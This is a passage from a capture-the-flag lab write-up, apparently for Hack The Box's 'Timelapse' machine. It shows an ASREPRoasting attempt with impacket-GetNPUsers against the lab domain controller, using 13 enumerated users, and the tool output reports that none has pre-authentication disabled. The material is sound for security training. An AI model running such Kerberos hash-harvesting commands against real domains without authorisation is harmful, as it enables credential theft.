ASREPRoasting
A total of 13 domain users have been discovered through the [[Timelapse_RID_Cycling#[RID Cycling](https //www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack/)|RID Cycling attack]] and validated.
When possessing valid domain user accounts, ASREPRoasting may be conducted to identify instances where the UF_DONT_REQUIRE_PREAUTH attribute is configured for these users.
Moreover, ASREPRoasting operates without the need for any authentication, solely relying on the cross-referencing of valid domain users.
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ impacket-GetNPUsers timelapse.htb/@dc01.timelapse.htb -dc-ip $IP -usersfile users.txt -request
Impacket v0.11.0 - Copyright 2023 Fortra
password:
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User thecybergeek doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User payl0ad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User legacyy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sinfulz doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User babywyrm doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DB01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User WEB01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DEV01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_deploy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User TRX doesn't have UF_DONT_REQUIRE_PREAUTH setUnfortunately, all 13 users doesn’t have the UF_DONT_REQUIRE_PREAUTH attribute set